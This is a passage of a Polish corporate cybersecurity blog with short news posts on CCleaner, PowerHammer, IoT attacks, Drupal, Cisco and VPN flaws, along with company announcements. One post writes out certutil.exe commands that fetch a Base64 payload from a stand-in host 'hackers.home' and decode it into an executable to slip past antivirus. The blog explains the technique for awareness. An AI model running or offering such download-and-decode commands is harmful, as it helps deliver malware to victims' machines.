  2. Kontrolując pierwszą maszynę, atakujący rozprzestrzenili na drugi komputer podłączony do tej samej sieci i otworzyli tam backdoor-a poprzez RDP (zdalny pulpit).
  3. Wykorzystali RDP by ściągnąć złośliwe oprogramowanie.
  4. Atakujący uruchomili lepszą wersje backdoor-a (ShadowPad)
  5. Atakujący infekowali kolejne komputery.
  6. Pomiędzy kwietniem a lipcem atakujący pracowali nad własną-złośliwą wersją CCleaner-a. Dodatkowo próbowali rozszerzyć swoją aktywność na kolejne komputery, poprzez zainstalowanie keylogg-erów na już kontrolowanych jednostkach. W ten sposób weszli w posiadanie uprawnień administratora.
  7. Atakujący podmienienie najnowszą wersje CCleaner-a na spreparowaną przez atakujących, czyli wzbogaconą o „funkcjonalność” backdoor-a.
  8. Złośliwe oprogramowanie zostało ściągnięte i uruchomione z uprawnieniami systemowymi przez ponad 2 miliony użytkowników. Śledztwo wykazało, że pomimo tak szerokiej skali ataki, celem było zaledwie 40, szczegółowo wybranych komputerach (0,004% wszystkich zainfekowanych). Należały one do Google, Microsoft, Cisco, Intel, Samsung, Sony, HTC, Linksys, D-Link, Akamai oraz VMware.

Podsumowując – hakerzy przebywali niezauważeni w infrastrukturze firmy przez ponad pół roku. W tym czasie skrupulatnie przygotowywali się do właściwego ataku. Jego efekt – zarażonych ponad 2 miliony klientów firmy w tym 40 stacji, które były realnym celem hakerów.

Jakie wnioski płynął z tej historii? Po pierwsze – stosujmy zasadę ograniczonego zaufania. Po drugie – korzystajmy z zaufanego oprogramowanie zabezpieczającego, nieustannie monitorujmy własne systemy wspieranego przez wykwalifikowany zespół specjalistów. Wtedy moment wykrycia ataku będzie znacznie szybszy, a reakcja znacznie skuteczniejsza.

Źródło: The Hacker News

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

EXATEL i Przemyśl projektują Smart City

Jakie problemy mieszkańców i samego miasta może rozwiązać Smart City? Jak wdrażać technologię, aby przede wszystkim odpowiadała na realne potrzeby Przemyśla? Jak zaplanować rozwój miasta w dłuższej perspektywie? Na te i inne pytania odpowiadają uczestnicy zorganizowanych przez EXATEL warsztatów dla Urzędu Miejskiego w Przemyślu.

Pierwsze z dwóch planowanych warsztatów, które ma miejsce 19 i 20 kwietnia, to element zamówionego przez władze miasta audytu. Jego efektem mają być rekomendacje dotyczące zakresu i sposobu wdrożenia rozwiązań Smart City w Przemyślu.

Smart City to nie tylko modne i chwytliwe hasło. Wprowadzenie rozwiązań kryjących się pod nim to konieczność dla polskich miast, a przemyślanie zasługują na technologie, które zaspokoją ich oczekiwania oraz potrzeby związane ze zwiększeniem bezpieczeństwa i komfortu życia. Unikalne w skali kraju rozwiązania, które chcemy zastosować będą także wsparciem u ułatwieniem codziennej pracy jednostek miejskich.

Robert Choma, Prezydent Miasta Przemyśla

Smart City – miasto wspierające swoich mieszkańców

Czym jest Smart City? To miasto, które w interaktywny sposób komunikuje się ze swoimi mieszkańcami. Dzieje się tak dzięki wielu czujnikom, które zbierają informacje o otaczającej nas przestrzeni miejskiej i pomagają ludziom w ich codziennym życiu. Przykładem praktycznego użycia technologii Smart City mogą być czujniki jakości powietrza, oświetlenie samoczynnie włączające się wraz ze zmierzchem, inteligentne kamery informujące dyspozytorów o zagrożeniu, światła na skrzyżowaniach dostosowujące się do intensywności ruchu. Innymi słowy – to miasto, które aktywnie wspiera swoich mieszkańców.

Prowadzony audyt ma nam pomóc zdiagnozować i określić konkretne problemy oraz potrzeby Przemyśla i jego mieszkańców, ponieważ nie ma jednej, uniwersalnej formuły, którą można zastosować w każdym mieście. Dopiero wyniki takiej analizy pozwolą precyzyjnie zaplanować inwestycje. Cieszę się, że EXATEL zaproponował nam bardzo partnerską formę współpracy poprzez dialog z pracownikami naszych jednostek. Spojrzenie z zewnątrz przy jednoczesnym wykorzystaniu wiedzy tych osób, które na co dzień rozwiązują problemy Przemyśla, da z pewnością dobre efekty.

Robert Choma, Prezydent Miasta Przemyśla

Wdrożenie Smarty City w mieście tak zróżnicowanym topograficznie jak Przemyśl to duże wyzwanie. Dlatego musimy wiedzieć, które zadania są najistotniejsze? Na czym najbardziej zależy włodarzom miasta oraz jej mieszkańcom? Dopiero wtedy będziemy w stanie przygotować konkretne rekomendacje, co do sposobu budowy inteligentnego Przemyśla.

Rafał Magryś, wiceprezes EXATEL

Najważniejsze to badanie potrzeb

W trakcie pierwszego z dwóch warsztatów wypracowany zostanie zakres przemyskiego Smarty City. Przedstawiciele takich jednostek jak Urząd Miejski, Miejski Zakład Komunikacji, Przemyski Ośrodek Sportu i Rekreacji, Straż Miejska, Zarząd Dróg Miejskich oraz firm zajmujących się gospodarką komunalną wspólnie ustalą katalog potrzeb miasta oraz harmonogram prac. Kluczowym efektem będzie jednak lista konkretnych problemów do rozwiązania przez Smart City w dziedzinach takich jak technologie IT, bezpieczeństwo, efektywność energetyczna i transport.

Zdjęcie przedstawiające osoby biorące udział w warsztatach

Wdrażanie Smart City to dobry przykład praktycznego wykorzystania możliwości, jakie daje nowa technologia. Znamy się na tym – badaniami i rozwojem zajmujemy się na co dzień. Jako polska firma tworzymy własne produkty, współpracujemy z krajowymi ośrodkami naukowymi. Ale też pracujemy nad technologiami przyszłości. Przykładem jest choćby nasze uczestnictwo w międzynarodowym projekcie RAPID 5G. W 2017 roku zorganizowaliśmy pierwsze w Europie testy technologii 5G w przestrzeni publicznej. Rozwiązań, które będą kołem zamachowym dla rozwoju inteligentnych miast.

Rafał Magryś, wiceprezes EXATEL

Co ważne, Smart City zakłada również udostępnienie zbieranych danych. Tak, by można było je swobodnie wykorzystać do tworzenia aplikacji na użytek określonych grup mieszkańców. Dla przykładu sama tylko Barcelona udostępniła w sumie kilka tysięcy zestawów otwartych danych.

Planowane zakończenie audytu planowane jest na maj 2018 roku. Raport przygotowany przez EXATEL zawierać będzie wskazówki, jak najefektywniej zbudować inteligentne miasto. Co ważne – nie tylko pod względem technologicznym. Ważnym elementem będą również sugestie, w jaki sposób zebrane przez czujniki dane można wykorzystać dla dobra lokalnej społeczności.

Cyber blog

Kradzież danych z komputerów klasy TEMPEST

Izraelscy badacze znaleźli sposób na wydobycie danych z odizolowanych komputerów. I nie chodzi wcale „zwykłe” komputery, które działają w wydzielonej sieci. Ale o komputery specjalnego przeznaczenia klasy TEMPEST (z ang. Transient Electromagnetic Pulse Emanation Standard).

Czym jest standard TEMPEST

Każde urządzenie podłączone do linii zasilającej i włączone, generuje promieniowanie elektromagnetyczne. Dzięki określonym technologiom można je przechwycić i odszyfrować, co robi na nich użytkownik. Dlatego do przetwarzania informacji tajnych używa się specjalnych urządzeń. Tego typu komputery są całkowicie odłączone od Internetu i sieci lokalnej. Dodatkowo zabezpieczone są przed wyciekiem takich elementów jak światło, dźwięk, ciepło oraz pole elektromagnetyczne. Właśnie to są urządzenia klasy TEMPEST.

TEMPEST znaczy bezpieczne?

Tego typu urządzenia zazwyczaj trzymane są w specjalnie przygotowanych, wzmocnionych pomieszczeniach o ograniczonym dostępnie i wzmocnionych ścianach (odpornych np. na atak elektromagnetyczny). Dlatego uważa się je za bezpieczne.

Jakie są słabe ogniwa tego sytemu? Jak każde urządzenie wymaga człowieka do obsługi oraz zasilania, aby działać. I właśnie tą droga poszli badacze z Uniwersytetu Ben-Guriona w Izraelu. Udowodnili, że można skutecznie i niepostrzeżenie ukraść dane z takiego komputera. I wszystko to pisali w raporcie PowerHammer: Exfiltrating Data from Air-Gapped Computers through Power Line.

Aby tak się stało konieczne jest zainfekowanie maszyny złośliwym kodem (z ang. malware) o nazwie PowerHammer. Drugim warunkiem jest podłączenie urządzenie do sieci energetycznej w budynku. Złośliwy kod monitoruje pracę procesora i wysyła do sieci energetycznej pewne impulsy alfabetem morsa. Inne specjalnie przygotowane urządzenie, wpięte do sieci tej samej energetycznej, jest w stanie te dane wykryć i odczytać. Transfer danych nie był zbyt wysoki. Osiągał poziom kilku – kilkudziesięciu bitów na sekund. Za to wszystkie bity były poprawnie odczytywane, bez żadnych błędów.

Testowanie rozwiązanie nie umożliwia skopiowania całej dokumentacji. Ale z powodzeniem może służyć do wycieku małych ilości danych takich jak hasła, tokeny, czy klucze szyfrujące.

Źródło: The Hacker News

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Spotkanie przedstawicieli Palo Alto i EXATEL

Palo Alto Networks i EXATEL rozwijają współpracę

Tworzenie narzędzi do skutecznej ochrony wymaga kreatywności oraz najlepszych dostępnych na rynku technologii. O efektach synergii ekspertów i wysokiej klasy narzędzi rozmawiali w siedzibie EXATEL Mark Anderson – prezes Palo Alto Netorks oraz Nikodem Bończa Tomaszewski, prezes zarządu polskiego operatora telekomunikacyjnego. Jednym z kluczowych tematów były również perspektywy rozwoju dotychczasowej współpracy obu firm.

Wspólna wizja bezpieczeństwa ICT

Celem EXATEL jest tworzenie i dostarczanie klientom najlepszych zabezpieczeń oraz narzędzi do kontroli cyfrowej komunikacji. W podobny sposób na swoją rolę patrzy amerykański producent rozwiązań z zakresu cyberbezpieczeństwa – Palo Alto Networks. Firma ta obsługuje ponad 48 000 klientów w ponad 150 krajach na całym świecie. W opinii Gartnera od 2011 roku Palo Alto Networks uznawany jest za lidera rynku zapór sieciowych (tzw. firewall’i) – rozwiązań, które wykorzystuje również EXATEL.

W trakcie spotkania Nikodema Bończa Tomaszewskiego – prezesa zarządu EXATEL i Marka Andersona – prezesa Palo Alto Networks poruszany był przede wszystkim temat dalszej współpracy obu firm.

EXATEL to dla nas doskonały partner biznesowy. Rozumie i dzieli naszą determinację do jak najlepszej ochrony cyfrowego życia przed cyberatakami. Cyberochrona jest dużym wyzwaniem w dzisiejszych czasach. Razem możemy pomóc organizacjom w centralnej i wschodniej Europie lepiej zabezpieczyć funkcjonowanie w świecie online za pomocą najnowszych technologii w dziedzinie ochrony, automatyzacji i analityki.

Mark Anderson, prezes Palo Alto Networks

Cyberbezpieczeństwo to połączenie wiedzy, doświadczenia oraz właściwych technologii. Właściwy wybór rozwiązań jest równie ważny, jak zgrany zespół ekspertów od bezpieczeństwa IT. Dlatego wybieramy partnerów cieszących się dużym zaufaniem, posiadających sprawdzone produkty i usługi. Rozmowa z prezesem Palo Alto Networks potwierdziła, że w kluczowych kwestiach myślimy podobnie i mamy konkretną wizję dalszej współpracy naszych firm. Również w zakresie wymiany wiedzy o cyberzagrożeniach.

Nikodem Bończa Tomaszewski, prezes EXATEL

Różnorodność produktów bezpieczeństwa ICT w EXATEL

Palo Alto Network to obecnie jeden z ważniejszych dostawców rozwiązań cyberbezpieczeństwa dla Security Operations Center (w skrócie SOC) EXATEL. Łącząc technologie od wyselekcjonowanych partnerów z wiedzą i doświadczeniem naszych specjalistów dajemy naszym klientom bezpieczeństwo w cyfrowym świecie. Z kolei szeroka gama usług (od testów penetracyjnych, antyDDoS, DLP, kończąc na usługach forensic) umożliwia nam dostosowanie ochrony pod potrzeby konkretnej instytucji.

Cyber blog

Kradzież przez termometr, czyli o bezpieczeństwie Internetu Rzeczy

Wiele się mówi, jak dużo w naszym życiu zmieni Internet Rzeczy czyli IoT (z ang. Internet of Things). IoT już teraz towarzyszy nam w codziennym życiu. Jak każda technologia, ma on ciemne strony. Urządzenia te np. „wiedzą”, co się dzieje w naszym otoczeniu, kiedy wychodzimy lub wracamy do domu itp. Gromadząc tego typu informacje można w łatwy sposób stworzyć pełny profil właściciela urządzeń. Jednak to nie jest najgroźniejszy aspekt IoT. Jest nim dobre, stare cyberbezpieczeństwo.

Internet Rzeczy, czyli jak obejść systemy bezpieczeństwa

Dosłownie kilka dni temu pisaliśmy o ataku hakerskim poprzez inteligentną maszynę do kawy podłączoną do internetu. Dzisiejsza historia jest jeszcze ciekawsza, biorąc pod uwagę cel – kasyno. Wg. opisu wydarzenia miały miejsce w 2017 roku (tego typu sprawy wychodzą ze znacznym opóźnieniem) gdzieś w Ameryce Północnej. Jak wiadomo kasyna bardzo dbają o bezpieczeństwo swoich systemów IT. Tym razem wszystkie zabezpieczenia zostały pokonane przez… termometr akwarium stojącego w holu kasyna.

Łowienie danych

Tak jak w przypadku ataku poprzez inteligentną kawiarkę, hakerzy wykorzystali urządzenie IoT podłączone bezpośrednio do internetu. Wykorzystując niezbyt skomplikowany i słabo zabezpieczony termometr wodny przedostali się do bezpiecznej sieci kasyna. Tam skopiowali ważna z komercyjnego punktu widzenia bazę danych i – za pomocą urządzenia w akwarium – przesłali ją z powrotem do chmury w otwartym Internecie. Wektor ataku genialnie prosty i niezwykle skuteczny. Jasno wskazuje, że bezpieczeństwo systemów IT jest mocne tak, jak jego najsłabsze ogniowo.

Internet Rzeczy – diabeł nie taki straszny, jak go malują

IoT nie jest rozwiązaniem, którego należy się bać. Można bezpiecznie z niego korzystać. Należy jednak pamiętać o kilku kluczowych zasadach, które zminimalizują ryzyko ataku. Po pierwsze świadomość zagrożeń. Urządzenia IoT tworzone są z myślą o wygodzie. Dlatego ich producenci kładą nacisk na łatwość ich użytkowania. Niestety, często odbywa się to kosztem bezpieczeństwa. Dlatego uczmy się korzystać z Interentu Rzeczy w sposób rozsądny i świadomy.

Zadbajmy o dodatkowe zabezpieczenia. Jeżeli już korzystamy z urządzeń IoT, kontrolujmy je. Ograniczmy liczbę tych łączących się swobodnie z internetem do minimum i – jeśli to tylko możliwe – chowajmy je za firewallem. Przydatne będą też rozwiązania typu Data Leak Protection chroniące systemy IT przed wyciekiem danych.

Pamiętajmy o regularnej aktualizacji urządzeń IoT. Jak każde inne urządzenie IT, również one wymagają uaktualniania systemów sterujących.

Na koniec – regularnie testujmy zabezpieczenia, szukajmy potencjalnych luk w swoich systemach bezpieczeństwa. Do tego mogą służyć np. testy penetracyjne.

Źródło: The Hacker News

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Luka w Drupal – zaktualizuj CMS swojej strony

Krytyczna podatność nie jest końcem świata, jeżeli odpowiednio podejdzie się do problemu. Tak też robił zespół bezpieczeństwa Drupal – systemu zarządzania treścią (ang. CMS – Content Management System). 2 tygodnie temu odkryli poważną lukę bezpieczeństwa Drupalgeddon2. Jednak zanim informacja o tym przedostała się do Internetu, odpowiednia poprawka została już przygotowana i udostępniona.

Atakować nieprzygotowanych

11 kwietnia eksperci z Check Point oraz Dofinity opublikowali pełne informacje dotyczące Drupalgeddon2 (oznaczonego jako CVE-2018-7600). Na podstawie tych danych został przygotowany PoC (proof-of-concept) kody wykorzystującego podatność. Materiał ten pojawił się na GitHub.

Jak się zabezpieczyć CMS Drupal

Najważniejsze – niezwłocznie zaktualizować CMS. do Drupal 7.58 lub 8.5.1. Dla starszej wersji tj. 6 (dla której wsparcie zostało zakończone w lutym 2016 roku) aktualizacja także została stworzona. Bo jak pokazuje historia – to kwestia czasu, kiedy zobaczymy pierwsze ataki na witryny korzystające z tej technologii.

Źródło: The Hacker News

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Cyberbezpieczeństwo pokonane przez kawę

Czytając opisy różnych ataków wykierowanych w cyberbezpieczeństwo, bardziej skupiamy się na ich efekcie i użytych tam narzędziach. Dzięki temu słowa jak DDoS, malware, czy ransomware weszły już do codziennego słownika. Ale często ciekawszy jest wektor ataku czyli droga, jaką go przeprowadzono. Niecały miesiąc temu został opisany ciekawy przykład potwierdzający tą tezę.

Atakujący często idą po najmniejszej linii oporu. Wedle zasady, że łańcuch jest tak mocny, jak jego najsłabsze ogniwo, szukają luk w cyberochronie. Tak też się stało w przypadku jednej z fabryk petrochemicznych. Okazało się, że doszło do zainfekowania komputerów podłączonych do fizycznie odizolowanej sieci. Dopiero pełniejszy przegląd bezpieczeństwa wskazał, że w systemie była zaskakująca luka.

Ekspresem kawowym w cyberbezpieczeństwo

W wydzielonej sieci znalazło się jedno urządzenie biurowe, z którego korzystamy na co dzień. To expres do kawy, który w tym wypadku posiadał funkcję zamówienia kawę w przypadku jej braku. W materiale nie jest podane, jak dokładnie doszło do zainfekowania ekspresu. Jednak często przedmioty typu IoT, posiadają wbudowane własne karty SIM, by móc samodzielnie komunikować się ze światem zewnętrznym.

System małych niedociągnięć

Zainfekowanie ekspresu do kawy, który był wpięty do nieodpowiedniej sieci, nie był jedynym błędem w tym przypadku. Po analizie okazało się, że zabrakło też innych zabezpieczeń. Wśród nich takich jak: program antywirusowy na stacjach końcowych, pełnej segmentacji sieci czy systemy IPS. Tym samym kilka mniejszych i większych niedociągnięć w zabezpieczeniach odizolowanej od Internetu sieci przemysłowej w fabryce, pozwoliło ją zainfekować.

Źródło: Wykop

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Microsoft Outlook – niepełne łatanie luki bezpieczeństwa

Microsoft łata częściowo – jak rozwiązać ten problem

Źródło: The Hacker News

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

PUBG ransomware – zagraj w grę a odzyskasz pliki

Ransomware szyfrujący dane dla pieniędzy lub dla wywołania chaosu to niestety standard. Petya, WannyCry, ExPert, BadRabbit – to tylko niektóre wirusy, które w 2017 roku pojawiły się w mediach. Czy jest więc coś, co możne nas zaskoczyć? Okazuje się, że tak. Ostatnio pojawił się nowy malware szyfrujący dane na pulpicie. Ale żeby je odszyfrować nie trzeba płacić. Wystarczy, by użytkownik zagrał w popularną ostatnio grę „PlayerUnknown’s Battlegrounds” (PUBG).

Jak działa PUBG Ransomware

Brakuje informacji, jak ransomware trafiał na komputery użytkowników. Jednak po zaszyfrowaniu danych użytkownik otrzymuje następujący komunikat:

PUBG Ransomware

Your files, images, musics, documents are Encrypted!

Your files is encrypted by PUBG Ransomware!

but don’t worry! It is not hard to unlock it.

I don’t want money!

Just play PUBG 1Hours!

Or Restore is [ s2acxx56a2sae5fjh5k2gb5s2e ]

Jak widać użytkownik ma dwie opcje. Jedna (działająca!!) to wpisanie kodu podanego w informacji. Druga wymagała uruchomienia choćby na kilka sekund gry PlayerUnknown’s Battlegrounds. Wirus po wykryciu, że użytkownik gra w grę, rozpoczynał proces deszyfracji. Co ważne – w obu przypadkach ofiara nie musiała płacić żadnego okupu.

Ransomware promocyjny

Pozostaje tylko pytanie, jaki był cel stworzenia takiego wirusa? Czy promocja gry, a być może testowanie zachowań użytkowników… Szczegółowej odpowiedzi na to pytanie obecnie brak. 

Źródło: Bleeping Computer

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Podatność w Cisco IOS i Cisco IOS XE przyczyną problemu w Iranie

W oprogramowaniu Cisco IOS i Cisco IOS XE występuje podatność na usłudze Smart Install (CVE-2018-0171). Umożliwia ona przepełnienie bufora a następnie wykonanie dowolnego kodu na zaatakowanym urządzeniu.

Podatność w Cisco przyczyną ataku w Iranie

Wiele niezależnych źródeł podaje już, że podatności zaczyna być mocno wykorzystywana przez cyberprzestępców. Ostatni dostępny przykład wykorzystania tej luki do przeprowadzenia ataku pochodzi z Iranu, gdzie zostali sparaliżowani dostawcy internetu po udanym ataku na tysiące tych urządzeń. Ten atak można zaklasyfikować jako hacktywizm – podmieniona konfiguracja wyświetla amerykańską flagę.

Na celowniku przestępców może znajdować się wiele krajów i ich infrastruktura krytyczna. Według TALOS na świecie jest około 168 000 podatnych urządzeń. Według informacji pochodzących z portalu shodan.io, w Polsce znajduje się około tysiąca podatnych urządzeń. Najwięcej jest ich we Wrocławiu oraz Warszawie. Co ważne – wśród zagrożonych instytucji jest co najmniej 5 dużych organizacji potencjalnie podatnych na ten atak.

Cisco poinformował już o poprawce dla tej podatności.

Źródło: Embedi

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Facebook – 2,2 miliarda kłopotów

Kolejna rewelacja z największej sieci społecznościowej Facebook. Okazuje się, że wypłynęło 2,2 miliarda danych o użytkowników.

Mark Zuckerberg twierdzi, że to robota złych ludzi, który znaleźli sposób na wykorzystanie narzędzia wyszukiwania do wyciągania danych z serwerów. To już kolejny akt dramatu, jaki jest udziałem Facebooka. Najpierw skandal z Cambridge Analytica (50 milionów osób sprzedanych), potem kolejny wyciek (77 milionów), teraz to.

Jeszcze gorszą informacją od liczb kont, które zostały skompromitowane, jest sposób wykorzystania ukradzionych danych. Od niezależnych badaczy wciąż napływają informacje o kampaniach manipulujących ludźmi w USA (podczas wyborów), Nigerii czy Wielkiej Brytanii.

Mając do dyspozycji szczegółowe dane o człowieku – od e-maila, przez adres domowy, aktualnego zdjęcia do numeru telefonu, przestępcy mogli tworzyć bardzo skuteczne kampanie manipulujące użytkownikami. Człowieka, o którym wiadomo tak dużo, łatwo jest też zaatakować celowanym cyberatakiem.

Smaku dodaje fakt, że Zuckerberg broni mechanizmów gromadzenia szczegółowych danych o każdym użytkowniku Facebooka. Twierdzi, że ludzie wolą dobrze sprofilowane reklamy na swoich profilach od prywatności.

Naturalnie, dane użytkowników można znaleźć w Darkwebie.

Źródło: The Hacker News

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Każdy Windows ma wbudowany dropper. Wystarczy go użyć

Dropper i Windows – schemat ataku

Jeden z podstawowych schematów ataku zakłada, że ofiara ściągnie i uruchomi dropper (oprogramowanie umożliwiające instalowanie dodatkowego oprogramowania bez ingerencji ze strony użytkownika). Ten z kolei pobierze właściwy złośliwy kod. Okazuje się, że w standardowych instalacjach Windows znajduje się już wbudowane narzędzie certutil.exe, które skutecznie i bez zbędnych śladów może zostać wykorzystane jako dropper. Przewidzianą funkcjonalnością certutil.exe jest wyświetlanie, zarzadzanie certyfikatami i kluczami. Ten pozornie prosty programik posiada jednak bardzo rozwiniętą funkcjonalność parametrów z linii komend. Między innymi przyjmuje jako parametry adresy URL.

Dropper z Windows w praktyce

Wyobraźmy sobie następujący atak:

C:\Temp>certutil.exe -urlcache -split -f “https://hackers.home/badcontent.txt” bad.txt

Powoduje ściągnięcie z internetu złośliwego plik zakodowanego do Base64 (co zazwyczaj pozwala ominąć zabezpieczenia proxy i antywirusa)

C:\Temp>certutil.exe -decode bad.txt bad.exe

Rozpakowujemy plik do formy wykonywanej.

W efekcie pozostaje tylko wykonać złośliwy kod na komputerze ofiary i przejąć nad nim pełną kontrole.

 

Źródło: Internet Storm Center

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Przywódca Carabank i Cobalt zatrzymany

Lider grup przestępczych Carabank oraz Cobalt został zatrzymany przez hiszpańską policę. Prowadzona przez niego grupa specjalizowała się w rozprowadzaniu złośliwego oprogramowania, którego głównym celem były instytucje finansowe. Zatrzymanie było możliwe dzięki współpracy z Europolem, US FBI, władzami Rumunii, Białorusi, Tajwanu oraz kilku przedstawicieli prywatnych firm zajmujących się cyberbezpieczeństwem.

Zatrzymany działał od 2013 roku. Jego pierwszą większą kampanią złośliwego oprogramowania, był malware o nazwie Anunak. Z czasem oprogramowanie zostało rozbudowane i zmieniło nazwę na Carabank. Było o które było wykorzystywane do 2016 roku. Następnym etapem rozwoju grupy były jeszcze bardziej zaawansowane kampanie przestępcze.

infografika opisująca działanie grupy hakerskiej Corabank / Cobalt
Źródło infografiki – Europol

 

Źródło: Security Online

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

MonkeyRocket autorstwa NSA – fake VPN pod bitcoin

MonkeyRocket – Projekt NSA

Od dawna chodziły pogłoski, że NSA inwigilowała internet również w kontekście kryptowalut takich jak bitcoin. Po opublikowanych ostatnio przez Edwarda Snowdena tajnych dokumentach wychodzi, że inwigilacja NSA mogła sięgać dalej niż podejrzewano w ramach projektu MonkeyRocket.

Bitcoin zapewnia anonimowość?

W przypadku kryptowalut znane są metody śledzenia transakcji. Dzięki temu można się dowiedzieć skąd i dokąd trafiły środki wewnątrz sieci (lub gdzie nie trafiły). Oczywiście dotarcie nie było proste i wymagało dużo pracy. Co więcej – informacje te bazowały na adresach portfeli, a nie na użytkownikach. Nadal więc problematyczne było dotarcie do końcowego użytkownika.

NSA jednak znalazło na to sposób. Z udostępnionych dokumentów wynika, że pracowali nad projektem o nazwie MonkeyRocket. To był częścią jeszcze większego projektu – OAKSTAR.

MonkeyRocket – podstawiony VPN

To projekt polegającym na postawieniu monitorowanego serwisu typu VPN i udostępnieniu go użytkownikom. Osoby chcące w anonimowy sposób korzystać z Bitcoinów używali właśnie tego narzędzia. W ten sposób udostępniały one NSA wszystkie im potrzebne informacje.

OAKSTAR – patrząc w łącza światłowodowe

To tajny program, którego celem było monitorowanie ruchu przepływającego przez główne łącza światłowodowe. To dawałoby z kolei olbrzymie możliwości w weryfikacji komunikacji.

Źródło: The Markle

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Mapa Darknetu autorstwa Hyperion Gray

Grupa badaczy z grupy Hyperion Gray opublikowała wyniki swoich badań dotyczących Darknetu. Ich efektem jest mapa dostępnych stron w tej sieci. Do swoich prac wykorzystali projekt MEMEX stworzony w ramach Darpa (badawczy oddział Pentagonu w USA). Pozwala on tworzyć mapy przestrzeni wirtualnej.

Mapa Hyperion Gray

Naukowcy posiadali listę ponad 60,000 adresów z końcówką .onion. W styczniu 2018 te strony zostały automatycznie przejrzane (od słowa Crawled). Po ich przetestowaniu, tylko 6,600 wygenerowało odpowiedz. Większość, bo około 53,000 adresów, nie odpowiedziała albo zwróciła błąd.

Skrypt odwiedzając stronę, poza samą analizą kodu, robił jej także zrzut ekranu. Następnie witryny zostały porównane i automatyczne skategoryzowanie pod kątem podobnych treści. Końcowym wynikiem badań było utworzenie mapy powiązań umożliwiającej między innymi podgląd zawartości badanych stron.

Po przeanalizowaniu treści okazało się, że większość stron zawiera treści nielegalne względem prawa obowiązującego w Stanach Zjednoczonych. Ze względu na możliwość podglądu zawartości wspomnianych stron i fakt, że przedstawiane treści mogą być w różnych prawodawstwach uznawane za nielegalne, użytkownik przed odwiedzeniem strony musi potwierdzić fakt ukończenia 18 roku życia i świadomości tego ryzyka.

Czym jest Darknet

To sieć niedostępna dla zwykłych przeglądarek i wyszukiwarek internetowych. Bazuje ona na komunikacji F2F (z ang. Friend-to-friend – anonimowa sieć oparta o połączenie tylko ze znanymi przez siebie hostami) zapewniając znaczną anonimowość jej użytkownikom. Z tego też powodu jest często wykorzystywana do działań o charakterze przestępczym (o czym już wielokrotnie na Cyber Blogu pisaliśmy np. w kwestii danych osobowych).

Źródło: Hyperion Gray

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

VPN nie zawsze zapewnia anonimowość w sieci

VPN nie zawsze zapewnia anonimowość w sieci

Wiele milionów ludzi korzysta z usługi VPN, aby zapewnić sobie anonimowość w sieci. Dzięki temu rozwiązaniu możliwe jest ukrywanie swojego prawdziwego adresu IP i szyfrowanie transmisji danych. Okazuje się, że 3 dostawców tego typu usług takich jak HotSpot Shield, PureVPN i Zenmate ma z tym pewien kłopot. A to może przekładać się na miliony ich klientów.

Podatności w PureVPN i Zenmate nie zostały ujawnione, gdyż jeszcze nie pojawiły się odpowiednie poprawki oprogramowania. Błędy w produkcie HotSpot Shield firmy AnchorFree już zostały załatane a dotyczyły:

  1. Możliwość przejęcia ruchu sieciowego (CVE-2018-7879) – podatność występująca w rozszerzeniu do Chrome’a umożliwiała atakującym przejęcie ruchu i skierowanie go do złośliwej strony www.
  2. Wyciek DNS (CVE-2018-7879) – ruch DNS od użytkownika  Hotspot Shield był kierowany do serwera DNS właściwego dla jego komputera a nie dostępnego przez VPN. Umożliwia to dostawcom usług internetowych monitorowanie i rejestrowanie ich aktywności sieciowej.
  3. Wyciek rzeczywistego adresu IP  (CVE-2018-7880) – wszystkie domeny z “localhost” jak localhost.foo.bar.com i tekstem ‘type=a1fproxyspeedtest’ w adresie url powoduje ominięcie proxy i wyciek prawdziwego adresu IP.

To nie pierwszy przypadek problemów z usługami typu VPN. O innych pisaliśmy już w materiale Darmowy VPN od Facebook da Ci prywatność?

Źródło: The Hacker News

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Paloalto – analiza aktywności eksploit-kit RIG

​Jak donosi Paloalto, badacze z grupy Unit42 opublikowali raport dotyczący zmian w aktywności eksploit-kitu RIG w przeciągu ostatniego roku. Jeśli chodzi o docelowy typ złośliwego oprogramowania, którym infekowany jest komputer ofiary, zarejestrowano istotny spadek aktywności ransomware. Wzrosła natomiast aktywność malware typu crypto-miner.

RIG mniej aktywny, ale malware kryptowalutowy wzrósł o 2700%

Raport wskazuje na blisko 90% spadek aktywności eksploit-kitu na przestrzeni od stycznia 2017 roku do stycznia 2018 roku. Niezależnie od aktywności tego konkretnego złośliwego oprogramowania, badacze wskazali na inną ciekawą prawidłowość. Na przestrzeni ostatniego roku na ogólny wzrost aktywności malware kopiącego kryptowalutę sięgnął ponad 2700%.

Jeśli chcecie dowiedzieć się wiecej o eksploicie RIG, zapraszamy do lektury naszej informacji o Zatrutym wodojopu, czyli sieci malware w Polsce oraz raportu specjalnego “Krótka historia wędrownego bajtu 10

Źródło: Paloalto

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Czy DNS w twojej sieci jest szczelny?

Zespół badawczy firmy Fidelis (Threat Research) odkrył rosnącą tendencje kradzieży danych poprzez wykorzystanie protokoły DNS.
